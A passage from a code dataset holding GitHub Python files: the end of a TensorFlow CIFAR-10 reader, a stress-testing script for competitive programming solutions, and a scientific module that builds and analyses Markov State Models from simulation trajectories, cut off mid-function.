tf.sparse_to_dense(\n tf.concat(values=[indices,labels],axis=1),\n [batch_size,NUM_CLASSES],1.0,0.0)\n return images,labels\n\ndata_file = \"E:/PythonProject/data/tflearn/cifar-10-batches-py/data_batch_*\"\nimg,lab = read_cifar10(data_file,32)\nprint(img,lab)\n\n\n","repo_name":"SCismycat/TensorFlowLearning","sub_path":"tensorflow4book2/Section3_DataFlow/do_CIFAR10.py","file_name":"do_CIFAR10.py","file_ext":"py","file_size_in_byte":2682,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"14071045651","text":"# Libraries\n\nimport os\nfrom termcolor import cprint\n\nfrom config import *\n\n\ndef neutral(text=\"\", end=\"\\n\"):\n cprint(text, \"white\", end=end)\n\n\ndef info(text=\"\", end=\"\\n\"):\n cprint(text, \"blue\", end=end)\n\n\ndef success(text=\"\", end=\"\\n\"):\n cprint(text, \"green\", end=end)\n\n\ndef warning(text=\"\", end=\"\\n\"):\n cprint(text, \"yellow\", end=end)\n\n\ndef error(text=\"\", end=\"\\n\"):\n cprint(text, \"red\", end=end)\n\n\ndef run(command):\n if os.system(command) != 0:\n exit(3)\n\n\ndef try_run(command):\n return os.system(command)\n\n\ndef print_file(path):\n f = open(path, \"r\")\n for s in f.readlines():\n neutral(s, end=\"\")\n neutral()\n f.close()\n\nif IGNORE_WRONG_ANSWER:\n warning(\"Stress ignores verdict \\\"Wrong answer\\\"\")\n\n# Compiling\n\ninfo(\"Compiling generator...\")\nif try_run(GEN_COMPILE) != 0:\n error(\"Generator compilation failed\")\n exit(3)\nsuccess(\"Generator compilation finished\")\n\ninfo(\"Compiling solution...\")\nif try_run(SOLUTION_COMPILE) != 0:\n error(\"Solution compilation failed\")\n exit(3)\nsuccess(\"Solution compilation finished\")\n\ninfo(\"Compiling correct solution...\")\nif try_run(CORRECT_SOLUTION_COMPILE) != 0:\n error(\"Correct solution compilation failed\")\n exit(3)\nsuccess(\"Correct solution compilation finished\")\n\n# Testing\n\ncnt = 1\nwhile True:\n warning(f\"Test {cnt}: \", end=\"\")\n\n if try_run(GEN_RUN + f\" > {WORKING_DIRECTORY}input.txt\") != 0:\n error(\"Generator runtime error\")\n exit(3)\n\n if try_run(SOLUTION_RUN + f\" < \\\"{WORKING_DIRECTORY}input.txt\\\"\" +\n f\" > \\\"{WORKING_DIRECTORY}output.txt\\\"\") != 0:\n error(\"Runtime error\")\n info(\"Input:\")\n print_file(f\"{WORKING_DIRECTORY}input.txt\")\n exit(0)\n\n if try_run(CORRECT_SOLUTION_RUN + f\" < \\\"{WORKING_DIRECTORY}input.txt\\\"\" +\n f\" > \\\"{WORKING_DIRECTORY}answer.txt\\\"\") != 0:\n error(\"Correct solution runtime error\")\n info(\"Input:\")\n print_file(f\"{WORKING_DIRECTORY}input.txt\")\n exit(3)\n\n if (not IGNORE_WRONG_ANSWER) and (\n try_run(f\"cmp {WORKING_DIRECTORY}output.txt {WORKING_DIRECTORY}answer.txt --silent\") != 0):\n error(\"Wrong answer\")\n\n info(\"Input:\")\n print_file(f\"{WORKING_DIRECTORY}input.txt\")\n\n info(\"Solution output:\")\n print_file(f\"{WORKING_DIRECTORY}output.txt\")\n\n info(\"Answer:\")\n print_file(f\"{WORKING_DIRECTORY}answer.txt\")\n exit(0)\n\n success(\"OK\")\n\n if PRINT_PASSED_TESTS:\n info(\"Input:\")\n print_file(f\"{WORKING_DIRECTORY}input.txt\")\n\n info(\"Answer:\")\n print_file(f\"{WORKING_DIRECTORY}answer.txt\")\n\n cnt += 1\n","repo_name":"molney239/competitive","sub_path":"stress/stress.py","file_name":"stress.py","file_ext":"py","file_size_in_byte":2644,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"99"} +{"seq_id":"2910310992","text":"'''\nThis file contains the class definition for my custom MSM class. \n\nUnlike pyEMMA, my version does not compute the connected set of the underlying\ntransition matrix before doing the estimation. It uses the full state space of \nobserved transitions. There are however, parameters to cut out particular states\nand transitions based on a supplied minimum count number. I have set the defaults \nto what I have found works best. \n\nTo construct MSMs, I...\n1) Compute count matrix from a list of discrete trajectories\n2) Cut out states according to minimum count thresholds\n3) Normalize into a probability transition matrix by computing row sums\n4) Compute a reduced representation only over the active states in the system\n5) Compute absorbing sets (only if requested), this takes some time.\n\nI then provide methods for solving the forward equation, computing eigenvalues, \nand computing implied timescales. \n\nThe rest of the file contains functions for taking in trajectory data, converting to\ndiscrete trajectories according to the supplied state definitions, and computing MSMs\nas well as analyzing them. \n'''\n\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport sys\nimport os\nimport fnmatch\nimport glob\nimport itertools\nimport random\n\nimport pickle\n\nimport scipy\nimport scipy.io\nimport scipy.sparse\nimport scipy.sparse.linalg\n\nfrom scipy.sparse import dok_matrix\nfrom collections import defaultdict\n\nimport warnings\n\n\n\n##################################################################\n############# MSM Class Functions ###############################\n##################################################################\n\nclass MSM:\n\n #class methods\n def __init__(self, dtrajs, lag, Eh, Ep, num_states, min_count=1, min_frame=2, \n absorbingSets = False):\n #set all the input parameters, make count matrix, and probability matrix\n\n #init parameters that do not get set by MSM computation routines\n self.timescales = []\n self.absorbing = set()\n self.absorbing_active = set()\n\n #set the id parameters \n self.lag = int(lag)\n self.Eh = Eh\n self.Ep = Ep\n\n #set cutoff parameters\n self.min_count = int(min_count)\n self.min_frame = int(min_frame)\n\n #init the sparse matrix storage\n self.num_states = num_states\n self.count_matrix = scipy.sparse.dok_matrix((num_states, num_states), dtype=int)\n self.P = scipy.sparse.csr_matrix((num_states, num_states), dtype=float)\n self.row_counts = np.zeros(num_states, dtype=float)\n\n #init state info lists\n self.active_set = []\n self.inactive = []\n self.col_rem = []\n\n #init the sparse matrix storage for active states\n self.num_states_active = 0\n self.count_matrix_active = []\n self.P_active = []\n self.row_counts_active = []\n self.fullToNew = np.zeros(num_states, dtype=int)\n\n #print a start message\n print(\"Estimating Markov Model\")\n\n #compute the count matrix using dtraj data\n self.constructCountMatrix(dtrajs)\n print(\"Count Matrix Constructed\")\n print(\"Total Counts = {}\".format(self.row_counts.sum()))\n\n #apply cutoffs for frame and transition counts\n with warnings.catch_warnings():\n warnings.simplefilter('ignore') #sparse efficiency warning, cant be avoided\n self.applyCutoffs()\n print(\"Cutoffs Applied:\")\n print(\"Min Transitions = {}, Min Frames = {}\".format(self.min_count, self.min_frame))\n\n #determine inactive state\n self.findInactive()\n print(\"Inactive States have been identified\")\n\n #get the transition matrix\n with warnings.catch_warnings():\n warnings.simplefilter('ignore') #divide by 0 warning, fine b/c those rows are purged later\n self.getProbabilityMatrix()\n print(\"Rows re-normalized into a probability matrix\")\n\n #compute a reduced representation over the active set\n self.computeActive()\n print(\"A reduced transition matrix has been constructed over the active set\")\n\n #determine absorbing sets if requested\n if (absorbingSets):\n print(\"Identifying Absorbing states by repeated squaring\")\n self.findAbsorbing()\n print('Absorbing States have been identified')\n\n def applyCutoffs(self):\n #apply the two cutoffs to the count matrix\n\n #remove rows with little sampling and transitions with few counts\n for i in range(self.num_states):\n #set states below min_count to 0\n r = self.count_matrix.getrow(i)\n nonzero_mask = np.array(r[r.nonzero()] < self.min_count)\n if nonzero_mask.size > 1:\n idx = r.nonzero()[1][nonzero_mask[0]]\n self.count_matrix[i,idx] = 0\n\n #set rows with few frames to zero\n r = self.count_matrix.getrow(i)\n if (r.sum() < self.min_frame):\n idx = r.nonzero()[1]\n self.count_matrix[i,idx] = 0\n self.col_rem.append(i)\n \n\n #remove all column entries corresponding to removed rows\n for i in self.col_rem:\n c = self.count_matrix.getcol(i)\n idx = c.nonzero()[0]\n if (len(idx)) > 0:\n #print(\"Removing {} entries from column {}\".format(len(idx),i))\n self.count_matrix[idx,i] = 0\n\n\n #change the sparsity structure (removes memory for all 0 entries)\n self.count_matrix.eliminate_zeros()\n\n #get the new number of counts in each row of the matrix for normalization\n self.row_counts = np.asarray(self.count_matrix.sum(axis=1)).squeeze()\n\n def constructCountMatrix(self, dtrajs):\n #construct the count matrix using the given trajectories and parameters\n\n '''\n for speed, store (i,j) pairs as keys in a dict, create matrix from there\n '''\n\n matrix_dict = defaultdict(int)\n\n #loop over each path in dtrajs\n for path in dtrajs:\n\n #loop over all entries in the path, get transition for i+lag\n for i in range(len(path)-self.lag):\n\n #get a transition from frame i to i+lag\n state1 = path[i]\n state2 = path[i+self.lag]\n\n #update the count dict\n matrix_dict[state1, state2] += 1\n\n #use the dict to set the matrix\n dict.update(self.count_matrix, matrix_dict)\n\n #convert to csr\n self.count_matrix = self.count_matrix.tocsr()\n\n #get row counts\n self.row_counts = np.asarray(self.count_matrix.sum(axis=1)).squeeze()\n\n def getProbabilityMatrix(self):\n #use the count matrix and counts to get a normalized probability matrix\n\n #create a sparse matrix with reciprocal rows sums on the diagonal\n c = scipy.sparse.diags(1/self.row_counts.ravel())\n\n #empty rows will get an inf. Set these to zero and log them as inactive\n find_inf = scipy.sparse.find(c > 1)[0]\n c.tocsr()\n c.data[0][find_inf] = 0\n \n #compute dot product to get PTM\n self.P = c.dot(self.count_matrix)\n diagonal = self.P.diagonal()\n\n #check which rows have no entries, set diag to 1 there\n for i in range(self.num_states):\n r = self.P.getrow(i)\n if (r.sum() < 1e-4):\n diagonal[i] = 1.0\n\n self.P.setdiag(diagonal)\n\n def findInactive(self):\n #determine inactive states in transition matrix\n\n #print info message to user\n print(\"Performing passes over the states to determine inactive states\")\n\n #perform 100 attempts. should be sufficient for even large systems\n for attempt in range(100):\n\n #init an identified list to store which inactive states are found each attempt\n identified = []\n for i in range(self.num_states):\n if i not in self.inactive:\n\n #check if the i-th row has no entries\n cr = self.count_matrix.getrow(i)\n if cr.sum() < self.min_frame:\n\n #add to lists -> inactive, remove column, identified\n self.inactive.append(i)\n self.col_rem.append(i)\n identified.append(i)\n\n #get the column for the inactive state and remove transitions to it\n c = self.count_matrix.getcol(i)\n idx = c.nonzero()[0]\n if (len(idx)) > 0:\n print(\"Removing {} entries from column {}\".format(len(idx),i))\n self.count_matrix[idx,i] = 0\n\n #print out how many inactive states were identified this pass\n print(\"Pass {} identified {} inactive states\".format(attempt, len(identified)))\n\n #if no new states found, we are done\n if (len(identified)) == 0:\n return\n\n return\n\n\n def computeActive(self):\n #compute count and transition matrices over the active set\n\n #compute the active set by removing inactive states\n self.active_set = list(set(range(self.num_states)) - set(self.inactive))\n self.num_states_active = len(self.active_set)\n nsa = self.num_states_active\n\n #compute a map from full index to active index\n for full_state in range(self.num_states):\n try:\n new_index = self.active_set.index(full_state)\n except:\n new_index = -1\n self.fullToNew[full_state] = new_index\n\n #init the dok matrix for the reduced count matrix\n self.count_matrix_active = scipy.sparse.dok_matrix((nsa, nsa), dtype=int)\n\n #build the dok matrix entry by entry\n for active_state in range(nsa):\n\n #convert the active state index to full state index\n fsi = self.active_set[active_state]\n\n #get the nonzeros in the full count matrix row\n r = self.count_matrix.getrow(fsi).nonzero()[1]\n\n #iterate over each, check if the state is in active set, append entry\n for full_state in r:\n new_index = self.fullToNew[full_state]\n if new_index > -1:\n count = self.count_matrix[fsi,full_state]\n self.count_matrix_active[active_state,new_index] = count\n\n #convert to csr\n self.count_matrix_active = self.count_matrix_active.tocsr()\n\n #get row counts\n self.row_counts_active = np.asarray(self.count_matrix_active.sum(axis=1)).squeeze()\n\n #create a sparse matrix with reciprocal rows sums on the diagonal\n c = scipy.sparse.diags(1.0 / self.row_counts_active.ravel())\n\n #empty rows will get an inf, but there should be none. check this\n find_inf = scipy.sparse.find(c > 1)[0]\n if len(find_inf > 0):\n print(find_inf)\n print(self.count_matrix_active.getrow(find_inf[0]))\n print(\"Warning: An inactive state has survived pruning. Check this manually.\")\n sys.exit()\n\n #convert to csr\n c.tocsr()\n \n #compute dot product to normalize rows and get PTM\n self.P_active = c.dot(self.count_matrix_active)\n\n def findAbsorbing(self):\n #search for an absorbing set by taking powers of the transition matrix\n\n #start by squaring the transition matrix over the active set\n M = self.P_active * self.P_active\n\n #keep squaring the transition matrix to reach stationary distribution\n n = 36 #number of squarings. P_n = P^(2^n)\n for i in range(n):\n #do squaring\n M = M * M\n\n #eliminiate entries sufficiently close to 0\n nonzero_mask = np.array(M.data[M.data.nonzero()] < 1e-5)\n M.data[nonzero_mask] = 0\n M.eliminate_zeros()\n print(\"Transition matrix squared {} times\".format(i+1))\n\n\n #get the first row and its nonzero entries. record them\n for a in range(self.num_states_active):\n r = M.getrow(a)\n nz = r.nonzero()[1]\n for active_state in nz:\n #convert to state in full state space\n full_state = np.where(self.fullToNew == active_state)[0][0]\n\n #find the indices of the nonzero destinations\n active_stationary = scipy.sparse.find(M.getrow(active_state))[1]\n\n #convert these indices to the full state space\n full_stationary = []\n for i in range(len(active_stationary)):\n full_stationary.append(np.where(self.fullToNew == active_stationary[i])[0][0])\n \n #add a tuple to the absorbing set\n self.absorbing.add(tuple(full_stationary))\n self.absorbing_active.add(tuple(active_stationary))\n\n\n def computeEigenvalues(self, k = 100):\n #compute largest k eigenvalues of transition matrix over active states\n\n #compute the largest real eigenvalues of P.\n eigs = scipy.sparse.linalg.eigs(self.P_active.transpose(), k=k, which=\"LR\", maxiter=500000,\n ncv = self.num_states_active)\n\n #eigs = scipy.linalg.eig(self.P_active.toarray(), left=True, right=False)\n\n return eigs\n \n def computeTimescales(self, k):\n #use eigenvalues to compute timescales\n #use top k eigenvalues (excluding 1)\n\n #compute the largest real eigenvalues of P. \n eigs = self.computeEigenvalues()\n eigs = eigs[0] #toss out the eigenvectors\n\n #take the real part for timescales\n e = np.real(eigs)\n\n #sort the eigenvalues, get rid of the eigenvalues equal to 1\n e.sort()\n e = e[::-1]\n if (len(self.absorbing) > 0):\n K = len(self.absorbing)\n e = e[K:]\n else:\n for i in range(len(e)):\n if np.abs(e[i]-1) > 1e-8:\n K = i\n break\n e = e[K:]\n\n #take the largest k and use them to compute timescales\n E = e[0:k]\n self.timescales = - self.lag / np.log(E)\n\n return self.timescales\n\n def solveForwardEquation(self, initial, T):\n #solve forward equation until T*lag to get probability vector as fn of time\n\n #set the initial condition\n p0 = np.zeros(self.num_states, dtype=float)\n p0[initial] = 1.0\n\n #init storage for probabilities for all time and set ic\n probs = np.zeros((T+1, self.num_states), dtype=float)\n probs[0,:] = p0\n\n #iteratively multiply by transition matrix\n for i in range(T):\n probs[i+1,:] = probs[i,:] * self.P\n\n #construct temporal discretization\n t = np.linspace(0, T*self.lag, T+1)\n\n return t, probs\n\n def solveForwardEquationActive(self, initial, T):\n #solve forward equation until T*lag to get probability vector as fn of time\n\n #set the initial condition\n p0 = np.zeros(self.num_states_active, dtype=float)\n initial_active = self.fullToNew[initial]\n if (initial_active > -1):\n p0[initial_active] = 1.0\n else:\n raise(\"The chosen initial state is not part of the active set\")\n\n #init storage for probabilities for all time and set ic\n probs = np.zeros((T+1, self.num_states_active), dtype=float)\n probs[0,:] = p0\n\n #iteratively multiply by transition matrix\n for i in range(T):\n probs[i+1,:] = probs[i,:] * self.P_active\n\n #construct temporal discretization\n t = np.linspace(0, T*self.lag, T+1)\n\n return t, probs\n\n def solveForwardEquationActiveSpectral(self, initial, T):\n #solve forward equation by spectral decomp until T*lag to get \n #probability vector as fn of time\n\n #set the initial condition\n p0 = np.zeros(self.num_states_active, dtype=float)\n initial_active = self.fullToNew[initial]\n if (initial_active > -1):\n p0[initial_active] = 1.0\n else:\n raise(\"The chosen initial state is not part of the active set\")\n\n #init storage for probabilities for all time and set ic\n probs = np.zeros((T+1, self.num_states_active), dtype=float)\n #probs[0,:] = p0\n\n #construct temporal discretization\n t = np.linspace(0, T*self.lag*50, T+1)\n\n #get the left and right eigenvectors\n k = 250\n eigsL, vecsL = scipy.sparse.linalg.eigs(self.P_active.transpose(), k=k, which=\"LR\")\n\n eigsR, vecsR = scipy.sparse.linalg.eigs(self.P_active, k=k, which=\"LR\")\n\n print(eigsL)\n print(eigsL-eigsR)\n\n #sort them and search\n swaps = np.argsort(np.abs(eigsL))\n eig_sort = eigsL[swaps][::-1]\n print(eig_sort)\n\n #compute the spectral decomp\n for i in range(k):\n\n #get the eigenvalue \n ev = eig_sort[i]\n print(i,ev)\n # if np.abs(np.imag(ev)) > 1e-6:\n # print(\"Skipping complex\")\n # continue \n\n #get the left and right eigenvectors\n indexL = np.where(np.abs(eigsL - ev) < 1e-6)[0][0]\n indexR = np.where(np.abs(eigsR - ev) < 1e-6)[0][0]\n evL = vecsL[:,indexL]\n evR = vecsR[:,indexR]\n\n #check left eigvec for target component\n target_active = self.fullToNew[1182]\n # if (evL[target_active]/np.amax(np.abs(evL))) < 0.01:\n # print(\"Skipping unimportant\")\n # continue\n\n\n #compute inner product between p(0) and right evect. scale by evL * evR\n inner = np.dot(p0, evR)\n scale = np.dot(evR,evL)\n\n #multiply by the left eigenvector and scale\n inner *= evL / scale\n\n #add in the time evolution term, eigenvale to the power t\n probs += np.real(np.outer(np.power(ev,t/50), inner))\n\n return t, probs\n\n def plotYieldCurves(self, initial_index, target_index, final_time, animate_time,\n inv_map=None, samples_folder=None, sampling_target=None):\n #plot a yield curve for target state given an initial state and final time\n #can print out states with large probabilities if the inverse mapping is provided\n #can compare yield curve to sampling data if trajectory folder is provided\n #set the lag \n lag = self.lag\n\n #compute probability for each state as a function of time\n num_steps = int(final_time / (animate_time*lag))\n t, p = self.solveForwardEquationActive(initial_index, num_steps)\n t = t * animate_time \n\n #get a time scaling by getting number of digits\n num_digits = int(np.floor(np.log10(t[-1])))\n time_scaling = 10**num_digits\n t /= time_scaling\n\n #print out the notable final probabilities. Only if inv_map is provided\n if (inv_map is not None):\n\n #set the cutoff for a \"notable\" probability\n p_cut = 0.02\n print(\"Notable Final Probabilities:\")\n\n #print the state and probability for all above the threshold\n for i in range(self.num_states_active):\n if p[-1,i] > p_cut:\n state_full = np.where(self.fullToNew == i)[0][0]\n print(\"State: {}, Prob: {}\".format(inv_map[state_full], p[-1,i]))\n\n\n #plot the yield curve from initial state to target state\n new_idx = self.fullToNew[target_index]\n fig = plt.figure(1)\n ax = fig.add_subplot(111)\n plt.plot(t,p[:,new_idx])\n legend_text = [\"MSM Estimate\"]\n\n #compare to sampling data if the trajectory folder is provided\n if (samples_folder is not None and sampling_target is not None):\n \n print(\"Computing Yield Curve estimate from sampling data\")\n t_s, p_s, samples = computeSampledTargetProbability(samples_folder, \n sampling_target,\n animate_time)\n if samples > 0:\n t_s /= time_scaling\n ax.plot(t_s, p_s)\n legend_text.append(\"Brownian Dynamics ({} samples)\".format(samples))\n\n #format the plot axes and what-not\n ax.set_xlabel(r\"t/$10^{}t_0$\".format(num_digits), fontsize = 20)\n ax.set_ylabel(\"Yield\", fontsize = 20)\n\n #set num ticks\n plt.locator_params(axis='y', nbins=5)\n plt.locator_params(axis='x', nbins=4)\n\n #set tick label sizes\n ax.tick_params(axis='x', labelsize=16)\n ax.tick_params(axis='y', labelsize=16)\n\n #add legend\n ax.legend(legend_text, prop={'size':14})\n\n #remove whitespace and plot\n plt.tight_layout()\n\n #show the plot\n plt.show()\n\n return\n\n\n##################################################################\n############# Helper Functions #################################\n##################################################################\n\ndef getTrajType(type_string):\n #set boolean flags for each trajectory type using the supplied string\n\n #default each bool to false\n longT, shortT, otherT = False, False, False\n\n #check the string for identifying characters\n if (\"L\" in type_string):\n longT = True\n if (\"S\" in type_string):\n shortT = True\n if (\"D\" in type_string):\n otherT = True\n\n return longT, shortT, otherT\n\n\ndef getParameterMap():\n #read the parameter map text file to determine which parameter sets\n #correspond to which parameters\n\n #set the file location and open it\n param_file_loc = \"../MSM/parameterMap.txt\"\n param_file = open(param_file_loc, 'r')\n Lines = param_file.readlines()\n\n #init storage for the two parameter values and trajs types and read them in by line\n H = []\n P = []\n traj_types = []\n for line in Lines:\n line = line.split()\n H.append(line[1])\n P.append(line[2])\n traj_types.append(line[3])\n\n #close the parameter file and return the parameter values\n param_file.close()\n return H, P, traj_types\n\n\ndef loadStateDict(data_version = '', refine = False):\n '''\n Load the state dictionary. This is typically done from the MSM folder already, \n but ratcheting will try to do this from the simulation folder. Start by going back\n a level, then into the MSM directory to always reach it. \n\n If refinement is requested, also load the list of states that needed refinement\n as well as the refined dictionary.\n '''\n\n #check for refinement\n if refine:\n\n #set the file location for the refined states list\n refined_states_loc = \"../MSM/data\" + data_version + \"/refineStates\"\n refined_dict_loc = \"../MSM/data\" + data_version + \"/stateDictRefined\"\n\n try:\n\n #load the refined states\n with open(refined_states_loc, 'rb') as f:\n refineList = pickle.load(f)\n print(\"Set of refinement candidates loaded from {}\".format(refined_states_loc))\n\n #load the dict with refined states\n with open(refined_dict_loc, 'rb') as f:\n stateDict = pickle.load(f)\n\n except:\n print(\"A refinement file {} was not found.\".format(refined_states_loc),\\\n \"Please create this before performing requesting a refined discretization.\")\n raise()\n\n #otherwise load an empty refine list and the base state dictionary\n else:\n\n #create empty list and set the dict location\n refineList = []\n base_dict_loc = \"../MSM/data\" + data_version + \"/stateDict\"\n\n #load the dict with base states\n with open(base_dict_loc, 'rb') as f:\n stateDict = pickle.load(f)\n\n return stateDict, refineList\n\ndef loadMSMs(data_version = '', refine = True, restrict = [], verbose = True):\n #load the MSMs and place them in a list. Gather relevant parameters.\n\n #check if restricting the MSMs to a subset\n r_flag = False\n if len(restrict) > 0:\n if (verbose):\n print(\"Restricting MSMs to ensembles...\")\n print(restrict)\n r_flag = True\n\n #init list for MSMs\n MSMs = []\n\n #search the msm folder for all the MSMs, add to list\n msm_folder = 'msm' + data_version + '/'\n if (refine):\n name_convention = \"msmR\"\n else:\n name_convention = \"msm\"\n msm_files = fnmatch.filter(os.listdir(msm_folder), name_convention+\"*\")\n msm_files = np.sort(msm_files)\n for msm_file in msm_files:\n\n #write the file path, get the numbered index\n full_path = msm_folder+msm_file\n msm_index = int(msm_file.split(name_convention)[1])\n\n #check if being restricted\n if (r_flag and msm_index not in restrict):\n continue\n\n #load the MSM and append to list\n try:\n with open(full_path, 'rb') as f:\n msm = pickle.load(f)\n MSMs.append(msm)\n\n if (verbose):\n spaces = 6-len(msm_file)\n print(\"Loaded {}.{} Active set length is {}.\".format(msm_file,' '*spaces, len(msm.active_set)))\n except:\n print(\"Could not find {}\".format(msm_file))\n raise()\n\n #get the number of ensembles found\n K = len(MSMs)\n\n #access the energy parameters for each ensemble, (P,H)\n E2 = np.zeros(K, dtype=object)\n for k in range(K):\n p = MSMs[k].Ep\n h = MSMs[k].Eh\n E2[k] =[p,h]\n\n #return the data\n return MSMs, K, E2\n\n\n##################################################################\n############# Trajectory Extraction ############################\n##################################################################\n\n\ndef exclude(pair):\n #define rules to exclude a trajectory\n\n return False\n\n\ndef manualMapToState(stateDict, traj, frames, refine=False, refineList=[]):\n #map the trajectory in state space to a non-negative state index\n\n #init an array for the path in state space\n state_path = np.zeros(frames, dtype=int)\n\n #loop over tuples, get state index\n for i in range(frames):\n reducedState = [traj[i][0], traj[i][1], traj[i][4]]\n\n #check if performing refinement\n if refine:\n\n #check if this state is to be refined. if so use 5 coordinate rep\n if tuple(reducedState) in refineList:\n reducedState = traj[i]\n\n pair = tuple(reducedState)\n if (exclude(pair)):\n return np.zeros(0)\n state = stateDict[pair]\n state_path[i] = state\n\n return state_path\n\n\ndef extractTrajectories(dtrajs, folder, traj_files, stateDict, refineList = []):\n #extract trajectories stored in npy files, append to dtrajs\n\n #check for refinement\n refine = False\n if len(refineList) > 0:\n refine = True\n\n #loop over trajectories to get dtrajs\n for file in traj_files:\n\n #append the folder to get full path\n path = folder + file\n\n #filter the files under some criteria\n file_num = int(path.split('traj')[2].split('.')[0])\n if file_num < 0:\n continue\n\n #try to load the file (may fail due to blowup for given seed)\n try:\n data = np.load(path)\n except:\n continue\n\n #get the number of frames in the trajectory\n frames = len(data)\n\n #convert to an integer state trajectory\n #print(file)\n traj = manualMapToState(stateDict, data, frames, refine, refineList)\n #print(traj)\n #print(file, data[-1])\n\n #append to dtraj if there is a non-trivial trajectory\n if (len(traj)):\n dtrajs.append(traj)\n\n return\n\ndef getDtrajs(folder, stateDict, refineList, longT=True, shortT=False, otherT=False):\n #extract all the desired trajectories and return a list of them\n\n #init list to store trajectories\n dtrajs = []\n\n #check which trajectories we want to load\n if longT:\n\n #get list of all long trajectories\n try:\n trajs = fnmatch.filter(os.listdir(folder), 'traj*.npy')\n print(\"Extracting long trajectories. Found {}\".format(len(trajs)))\n extractTrajectories(dtrajs, folder, trajs, stateDict, refineList)\n\n except:\n print(\"Long trajectories requested but could not be found\")\n raise()\n\n if shortT:\n\n #get list of all short trajectories\n try:\n trajs = fnmatch.filter(os.listdir(folder+\"short/\"), 'traj*.npy')\n print(\"Extracting short trajectories. Found {}\".format(len(trajs)))\n extractTrajectories(dtrajs, folder+\"short/\", trajs, stateDict, refineList)\n\n except:\n print(\"Short trajectories requested but could not be found\")\n raise()\n \n if otherT:\n\n #get list of all other trajectories (disassembly trajs)\n\n #loop over relevant folders\n for traj_folder in glob.glob(folder+\"state12*\"):\n \n trajs = fnmatch.filter(os.listdir(traj_folder+\"/\"), 'traj*.npy')\n print(\"Extracting trajectories from {}. Found {}\".format(traj_folder, len(trajs)))\n extractTrajectories(dtrajs, traj_folder+\"/\", trajs, stateDict, refineList)\n\n \n #count how many trajectories were loaded\n num_trajs = len(dtrajs)\n if (num_trajs == 0):\n print(\"No trajectories could be loaded from folder {}. Exiting\".format(folder))\n raise()\n else:\n print(\"{} trajectories were loaded and discretized.\".format(num_trajs))\n\n #return the list of dtrajs\n return dtrajs\n\n\n############################################################################\n################### MSM Misc Testing #######################################\n############################################################################\n\n\ndef getTrajFolder(msm, initial_state):\n #determine which folder to search for trajectories for the specified test\n\n #get energy parameters\n p, h = msm.Ep, msm.Eh\n\n #get the base folder from these parameters\n traj_folder = \"../trajectories/P{}H{}/\".format(p,h)\n\n #get any modifications based on the starting state\n init_state_3 = (initial_state[0], initial_state[1], initial_state[-1])\n if init_state_3 != (0,0,0):\n traj_folder += \"state{}_{}_{}/\".format(*init_state_3)\n\n #return the folder\n return traj_folder\n\n\ndef MSMtesting(msm, initial_state, target_state, data_version, refine):\n #test MSM by computing a yield curve and comparing to sampling data\n\n #set animate time for the MSM and final time for the tests\n animate_time = 25\n final_time = 800000\n\n #load the dictionary of states\n stateDict, refineList = loadStateDict(data_version=data_version, refine=refine)\n num_states = len(stateDict)\n\n #get the inverse mapping\n inv_map = {v: k for k, v in stateDict.items()}\n\n #set the initial and target state indices using the stateDict\n initial_index = stateDict[initial_state]\n target_index = stateDict[target_state]\n\n #print info on the target transitions\n print(\"Ways to enter target state:\")\n print(msm.P.getcol(target_index))\n print(msm.count_matrix.getcol(target_index))\n\n print(\"Ways to exit target state:\")\n print(msm.P.getrow(target_index))\n print(msm.count_matrix.getrow(target_index))\n\n #print info on number of entries in transition matrix\n num_states = msm.num_states\n nz = msm.count_matrix.count_nonzero()\n print(\"{} nonzero entries out of {}, {} %\".format(nz, num_states*num_states, float(nz)/float(num_states)))\n\n #plot yield curves\n traj_folder = getTrajFolder(msm, initial_state)\n sampling_target = (target_state[0], target_state[1], target_state[-1])\n msm.plotYieldCurves(initial_index, target_index, final_time, animate_time, \n inv_map, traj_folder, sampling_target)\n\n return\n\n\ndef MSMtestingLoad(msm_loc,initial_state=(0,0,0), target_state=(12,30,30),\n data_version='', refine = False):\n #perform MSM testing by loading from pickle\n\n #try loading the MSM\n try:\n with open(msm_loc, 'rb') as f:\n msm = pickle.load(f)\n except:\n print(\"Could not load MSM at location {}\".format(msm_loc))\n raise()\n\n #do the testing\n MSMtesting(msm, initial_state, target_state, data_version, refine)\n\n return\n\n\n\n\ndef MSMtestingScratch(folder, lag, initial_state=(0,0,0), target_state=(12,30,30),\n data_version='', refine = False, \n longT=True, shortT=False, otherT=False):\n #do msm testing by constructing it manually\n\n #create the msm using given folder and lag\n msm = createMSM(folder, lag, data_version=data_version, refine=refine, \n longT=longT, shortT=shortT, otherT=otherT)\n\n #do the testing\n MSMtesting(msm, initial_state, target_state, data_version, refine)\n\n #save the msm so we can load it in the future\n with open(\"msm_tests/msmP{}H{}\".format(msm.Ep,msm.Eh), 'wb') as f:\n pickle.dump(msm, f)\n\n return\n\n\ndef computeSampledTargetProbability(folder, target_state, animate_time):\n #compute p(t) estimated using sampled trajectories\n\n #get all npy files in the given folder\n try:\n trajs = fnmatch.filter(os.listdir(folder), '*.npy')\n except:\n print(\"No such file or directory: {}\".format(folder))\n return np.array([0]), np.array([0]), 0\n\n #if none are found, return empty lists\n if (len(trajs) == 0):\n print(\"No npy files were found in {}\".format(folder))\n return np.array([0]), np.array([0]), 0\n\n #init storage\n frames = 0\n\n for npy_file in trajs:\n\n #load the npy file\n try:\n #print(npy_file)\n path = np.load(folder+npy_file)\n except:\n continue\n\n if (frames == 0): #do the first time setup\n frames = len(path)\n new_frames = frames\n p = np.zeros(frames, dtype=float)\n samples = np.zeros(frames, dtype=float)\n samples[0] = 0\n\n else: #test if later path has more frames\n new_frames = len(path)\n if new_frames > frames:\n p_new = np.zeros(new_frames)\n p_new[0:(frames)] = p\n p = p_new\n\n samples_new = np.zeros(new_frames)\n samples_new[0:(frames)] = samples\n samples = samples_new\n\n frames = new_frames\n\n count = 0\n for pair in path:\n if (pair[0] == target_state[0] and pair[1] == target_state[1] and pair[-1] == target_state[2]):\n p[count] += 1\n #break\n\n samples[count] += 1\n count += 1\n\n #get time discretization and normalize p\n t = np.linspace(0, animate_time*frames, frames)\n p = p / samples\n\n print(p)\n print(samples)\n\n return t, p, int(np.max(samples))\n\ndef computeCommittor(P, initial, target, num_states):\n #compute the committor probability for each state\n\n #convert single valued initial and target to lists\n initials = list(np.array([initial]).flat)\n targets = list(np.array([target]).flat)\n\n #init the system matrix and rhs\n R = np.array(P.todense())\n b = 